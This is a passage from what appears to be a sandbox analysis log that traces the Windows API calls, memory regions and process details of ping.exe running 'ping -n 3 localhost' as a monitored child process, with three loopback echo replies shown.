FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer=" \x8f\x09") returned 0x2 [0110.662] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x98f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0110.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.662] _write (in: _FileHandle=1, _Buf=0x98f20*, _MaxCharCount=0x2 | out: _Buf=0x98f20*) returned 2 [0110.663] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.663] LocalFree (hMem=0x98f20) returned 0x0 [0110.663] Sleep (dwMilliseconds=0x3e8) [0111.713] Icmp6SendEcho2 (in: IcmpHandle=0x98b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22fa20, DestinationAddress=0xbf55e0, RequestData=0x94830, RequestSize=0x20, RequestOptions=0x22f9d0, ReplyBuffer=0x9ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x9ebb0) returned 0x1 [0111.749] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fea4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0111.749] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f9a8, nSize=0x0, Arguments=0x22f9a4 | out: lpBuffer=" Q\x09") returned 0x10 [0111.749] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x95120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0111.749] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.749] _write (in: _FileHandle=1, _Buf=0x95120*, _MaxCharCount=0x10 | out: _Buf=0x95120*) returned 16 [0111.749] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.749] LocalFree (hMem=0x95120) returned 0x0 [0111.749] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer="\x10<\x09") returned 0x9 [0111.749] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x93c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0111.749] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.749] _write (in: _FileHandle=1, _Buf=0x93c10*, _MaxCharCount=0x9 | out: _Buf=0x93c10*) returned 9 [0111.749] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.749] LocalFree (hMem=0x93c10) returned 0x0 [0111.749] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer=" \x8f\x09") returned 0x2 [0111.749] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x98f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0111.749] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.749] _write (in: _FileHandle=1, _Buf=0x98f20*, _MaxCharCount=0x2 | out: _Buf=0x98f20*) returned 2 [0111.749] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.749] LocalFree (hMem=0x98f20) returned 0x0 [0111.749] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f970, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0111.750] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x22f940, nSize=0x0, Arguments=0x22f93c | out: lpBuffer="\xd0\x14\x0a") returned 0x56 [0111.750] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0xa14d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0111.750] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.750] _write (in: _FileHandle=1, _Buf=0xa14d0*, _MaxCharCount=0x56 | out: _Buf=0xa14d0*) returned 86 [0111.750] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.750] LocalFree (hMem=0xa14d0) returned 0x0 [0111.750] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x22f950, nSize=0x0, Arguments=0x22f94c | out: lpBuffer="\xe8\x14\x0a") returned 0x61 [0111.750] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0xa14e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0111.750] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.750] _write (in: _FileHandle=1, _Buf=0xa14e8*, _MaxCharCount=0x61 | out: _Buf=0xa14e8*) returned 97 [0111.750] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.750] LocalFree (hMem=0xa14e8) returned 0x0 [0111.750] IcmpCloseHandle (IcmpHandle=0x98b40) returned 1 [0111.754] LocalFree (hMem=0x94830) returned 0x0 [0111.754] LocalFree (hMem=0x9ebb0) returned 0x0 [0111.754] WSACleanup () returned 0 [0111.880] exit (_Code=0) Thread: id = 60 os_tid = 0xd08 Thread: id = 62 os_tid = 0xd18 Thread: id = 63 os_tid = 0xd1c Process: id = "38" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16900" os_pid = "0xd10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0xcec" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5789 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5790 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5791 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5792 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5793 start_va = 0xbf0000 end_va = 0xbf7fff entry_point = 0xbf0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 5794 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5795 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5796 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5797 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 5798 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5799 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5800 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5801 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5802 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5803 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5804 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5805 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5806 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5807 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5808 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5809 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5810 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5811 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5812 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5813 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5814 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5815 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5816 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5817 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5818 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5819 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 5820 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5821 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5822 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 5823 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5824 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 5825 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5826 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5827 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 5828 start_va = 0xc00000 end_va = 0x17fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 5829 start_va = 0x5c0000 end_va = 0x88efff entry_point = 0x5c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5830 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5831 start_va = 0x3a0000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 5875 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 5876 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 5877 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5878 start_va = 0x890000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 5943 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 5944 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5945 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5946 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5947 start_va = 0x920000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 5948 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 5949 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 5950 start_va = 0xbb0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 5951 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 61 os_tid = 0xd14 [0109.581] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe24 | out: lpSystemTimeAsFileTime=0x18fe24*(dwLowDateTime=0x7f518a80, dwHighDateTime=0x1d440a9)) [0109.581] GetCurrentProcessId () returned 0xd10 [0109.581] GetCurrentThreadId () returned 0xd14 [0109.581] GetTickCount () returned 0x263a2 [0109.581] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe1c | out: lpPerformanceCount=0x18fe1c*=16637040030) returned 1 [0109.582] GetModuleHandleA (lpModuleName=0x0) returned 0xbf0000 [0109.582] __set_app_type (_Type=0x1) [0109.582] __p__fmode () returned 0x76b331f4 [0109.582] __p__commode () returned 0x76b331fc [0109.582] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbf2ae1) returned 0x0 [0109.582] __getmainargs (in: _Argc=0xbf50d4, _Argv=0xbf50dc, _Env=0xbf50d8, _DoWildCard=0, _StartInfo=0xbf50e8 | out: _Argc=0xbf50d4, _Argv=0xbf50dc, _Env=0xbf50d8) returned 0 [0109.582] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.582] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.582] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xbf5440 | out: lpWSAData=0xbf5440) returned 0 [0109.594] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x18f8b4 | out: phkResult=0x18f8b4*=0x58) returned 0x0 [0109.594] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x18f8a8, lpData=0x18f8b0, lpcbData=0x18f8ac*=0x4 | out: lpType=0x18f8a8*=0x0, lpData=0x18f8b0*=0x0, lpcbData=0x18f8ac*=0x4) returned 0x2 [0109.595] RegCloseKey (hKey=0x58) returned 0x0 [0109.595] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x18f87c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18f8a4 | out: ppResult=0x18f8a4*=0x0) returned 11001 [0109.595] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x18f87c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18f8a4 | out: ppResult=0x18f8a4*=0x1f46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x1f47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x1f47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1f3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0109.732] FreeAddrInfoW (pAddrInfo=0x1f46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x1f47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x1f47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1f3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0109.732] Icmp6CreateFile () returned 0x1f8b40 [0109.735] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1f4830 [0109.735] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x1febb0 [0109.736] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18fda4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0109.736] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x18f8a4, nSize=0x0, Arguments=0x18f8a0 | out: lpBuffer="XH\x1f") returned 0x19 [0109.736] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x1f4858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0109.736] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.736] _write (in: _FileHandle=1, _Buf=0x1f4858*, _MaxCharCount=0x19 | out: _Buf=0x1f4858*) returned 25 [0109.736] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.736] LocalFree (hMem=0x1f4858) returned 0x0 [0109.736] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x18f8a8, nSize=0x0, Arguments=0x18f8a4 | out: lpBuffer="XH\x1f") returned 0x18 [0109.736] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x1f4858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0109.736] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.736] _write (in: _FileHandle=1, _Buf=0x1f4858*, _MaxCharCount=0x18 | out: _Buf=0x1f4858*) returned 24 [0109.737] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.737] LocalFree (hMem=0x1f4858) returned 0x0 [0109.737] SetConsoleCtrlHandler (HandlerRoutine=0xbf17ca, Add=1) returned 1 [0109.737] Icmp6SendEcho2 (in: IcmpHandle=0x1f8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x18f920, DestinationAddress=0xbf55e0, RequestData=0x1f4830, RequestSize=0x20, RequestOptions=0x18f8d0, ReplyBuffer=0x1febb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1febb0) returned 0x1 [0109.738] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18fda4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0109.738] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x18f8a8, nSize=0x0, Arguments=0x18f8a4 | out: lpBuffer=" Q\x1f") returned 0x10 [0109.738] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1f5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0109.738] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.738] _write (in: _FileHandle=1, _Buf=0x1f5120*, _MaxCharCount=0x10 | out: _Buf=0x1f5120*) returned 16 [0109.738] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.738] LocalFree (hMem=0x1f5120) returned 0x0 [0109.738] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer="\x10<\x1f") returned 0x9 [0109.738] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x1f3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0109.738] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.738] _write (in: _FileHandle=1, _Buf=0x1f3c10*, _MaxCharCount=0x9 | out: _Buf=0x1f3c10*) returned 9 [0109.739] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.739] LocalFree (hMem=0x1f3c10) returned 0x0 [0109.739] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer=" \x8f\x1f") returned 0x2 [0109.739] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x1f8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0109.739] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.739] _write (in: _FileHandle=1, _Buf=0x1f8f20*, _MaxCharCount=0x2 | out: _Buf=0x1f8f20*) returned 2 [0109.739] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.739] LocalFree (hMem=0x1f8f20) returned 0x0 [0109.739] Sleep (dwMilliseconds=0x3e8) [0110.769] Icmp6SendEcho2 (in: IcmpHandle=0x1f8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x18f920, DestinationAddress=0xbf55e0, RequestData=0x1f4830, RequestSize=0x20, RequestOptions=0x18f8d0, ReplyBuffer=0x1febb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1febb0) returned 0x1 [0110.831] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18fda4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0110.832] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x18f8a8, nSize=0x0, Arguments=0x18f8a4 | out: lpBuffer=" Q\x1f") returned 0x10 [0110.832] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1f5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0110.832] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.832] _write (in: _FileHandle=1, _Buf=0x1f5120*, _MaxCharCount=0x10 | out: _Buf=0x1f5120*) returned 16 [0110.832] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.832] LocalFree (hMem=0x1f5120) returned 0x0 [0110.832] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer="\x10<\x1f") returned 0x9 [0110.832] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x1f3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0110.832] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.832] _write (in: _FileHandle=1, _Buf=0x1f3c10*, _MaxCharCount=0x9 | out: _Buf=0x1f3c10*) returned 9 [0110.832] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.832] LocalFree (hMem=0x1f3c10) returned 0x0 [0110.832] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer=" \x8f\x1f") returned 0x2 [0110.833] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x1f8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0110.833] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.833] _write (in: _FileHandle=1, _Buf=0x1f8f20*, _MaxCharCount=0x2 | out: _Buf=0x1f8f20*) returned 2 [0110.833] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.833] LocalFree (hMem=0x1f8f20) returned 0x0 [0110.833] Sleep (dwMilliseconds=0x3e8) [0111.903] Icmp6SendEcho2 